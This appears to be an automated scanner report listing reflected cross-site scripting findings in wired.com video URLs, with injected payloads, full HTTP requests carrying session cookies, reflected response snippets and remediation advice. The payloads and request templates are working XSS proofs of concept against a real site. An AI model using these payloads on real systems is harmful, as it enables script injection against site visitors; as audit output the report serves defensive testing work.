GET /video/latest-videos/latest/1815816633/call-of-duty--afghanistanfc71f"-alert(1)-"d498532879a/664893966001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:44:18 GMT Date: Mon, 22 Nov 2010 00:39:18 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106752
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3463"-alert(1)-"374493d8e16 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/call-of-duty--afghanistan/664893966001e3463"-alert(1)-"374493d8e16 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=278 Expires: Mon, 22 Nov 2010 00:44:10 GMT Date: Mon, 22 Nov 2010 00:39:32 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106727
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7340c"><a>8892cc9fb2a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video7340c"><a>8892cc9fb2a/latest-videos/latest/1815816633/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29448 Vary: Accept-Encoding Cache-Control: max-age=282 Expires: Mon, 22 Nov 2010 00:38:56 GMT Date: Mon, 22 Nov 2010 00:34:14 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video7340c"><a>8892cc9fb2a ss_latest-videos c_latest"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 6cd9f--><script>alert(1)</script>ad403d2a150 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /video6cd9f--><script>alert(1)</script>ad403d2a150/latest-videos/latest/1815816633/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29487 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:40:09 GMT Date: Mon, 22 Nov 2010 00:35:09 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /video6cd9f--><script>alert(1)</script>ad403d2a150/latest-videos/latest/1815816633/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 --> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fed2d"><a>6a6f634c6a7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videosfed2d"><a>6a6f634c6a7/latest/1815816633/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=296 Expires: Mon, 22 Nov 2010 00:40:06 GMT Date: Mon, 22 Nov 2010 00:35:10 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106787
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videosfed2d"><a>6a6f634c6a7 c_latest"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 17088"-alert(1)-"d5156ec131b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos17088"-alert(1)-"d5156ec131b/latest/1815816633/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=287 Expires: Mon, 22 Nov 2010 00:41:10 GMT Date: Mon, 22 Nov 2010 00:36:23 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106798
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d11c7"-alert(1)-"40fba69b59c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latestd11c7"-alert(1)-"40fba69b59c/1815816633/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:42:27 GMT Date: Mon, 22 Nov 2010 00:37:27 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106808
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... "text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5cf86"><a>178493caa5e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos/latest5cf86"><a>178493caa5e/1815816633/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=291 Expires: Mon, 22 Nov 2010 00:41:19 GMT Date: Mon, 22 Nov 2010 00:36:28 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106723
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos c_latest5cf86"><a>178493caa5e"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e0a45"-alert(1)-"19c3ad2c058 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633e0a45"-alert(1)-"19c3ad2c058/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:42:33 GMT Date: Mon, 22 Nov 2010 00:37:33 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106755
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... "text/javascript">
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2cdd5"-alert(1)-"cc78e87875d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/cast-and-crew-talk-tron-reboot-secondskin-light-suits2cdd5"-alert(1)-"cc78e87875d/678922783001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=273 Expires: Mon, 22 Nov 2010 00:42:13 GMT Date: Mon, 22 Nov 2010 00:37:40 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106770
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49409"-alert(1)-"d0e080d2a60 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/cast-and-crew-talk-tron-reboot-secondskin-light-suits/67892278300149409"-alert(1)-"d0e080d2a60 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=288 Expires: Mon, 22 Nov 2010 00:42:49 GMT Date: Mon, 22 Nov 2010 00:38:01 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106755
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into an HTML comment. The payload a16d4--><script>alert(1)</script>6939ec5827d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /videoa16d4--><script>alert(1)</script>6939ec5827d/latest-videos/latest/1815816633/could-you-even-hear-anything-at-jon-stewarts-dc-rally/656445394001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29487 Vary: Accept-Encoding Cache-Control: max-age=278 Expires: Mon, 22 Nov 2010 00:45:02 GMT Date: Mon, 22 Nov 2010 00:40:24 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /videoa16d4--><script>alert(1)</script>6939ec5827d/latest-videos/latest/1815816633/could-you-even-hear-anything-at-jon-stewarts-dc-rally/656445394001 --> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5ebd"><a>fbbbc1e6440 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /videod5ebd"><a>fbbbc1e6440/latest-videos/latest/1815816633/could-you-even-hear-anything-at-jon-stewarts-dc-rally/656445394001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29448 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:44:56 GMT Date: Mon, 22 Nov 2010 00:39:56 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_videod5ebd"><a>fbbbc1e6440 ss_latest-videos c_latest"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6150c"><a>62255968c42 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos6150c"><a>62255968c42/latest/1815816633/could-you-even-hear-anything-at-jon-stewarts-dc-rally/656445394001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:45:26 GMT Date: Mon, 22 Nov 2010 00:40:26 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106769
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos6150c"><a>62255968c42 c_latest"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 45720"-alert(1)-"e14c5a60747 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos45720"-alert(1)-"e14c5a60747/latest/1815816633/could-you-even-hear-anything-at-jon-stewarts-dc-rally/656445394001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:46:28 GMT Date: Mon, 22 Nov 2010 00:41:28 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106801
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eeaa9"-alert(1)-"9d76291781f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latesteeaa9"-alert(1)-"9d76291781f/1815816633/could-you-even-hear-anything-at-jon-stewarts-dc-rally/656445394001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=286 Expires: Mon, 22 Nov 2010 00:47:06 GMT Date: Mon, 22 Nov 2010 00:42:20 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106828
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... "text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1eea"><a>5becca496a1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos/latestd1eea"><a>5becca496a1/1815816633/could-you-even-hear-anything-at-jon-stewarts-dc-rally/656445394001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=282 Expires: Mon, 22 Nov 2010 00:46:19 GMT Date: Mon, 22 Nov 2010 00:41:37 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106794
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos c_latestd1eea"><a>5becca496a1"> ...[SNIP]...
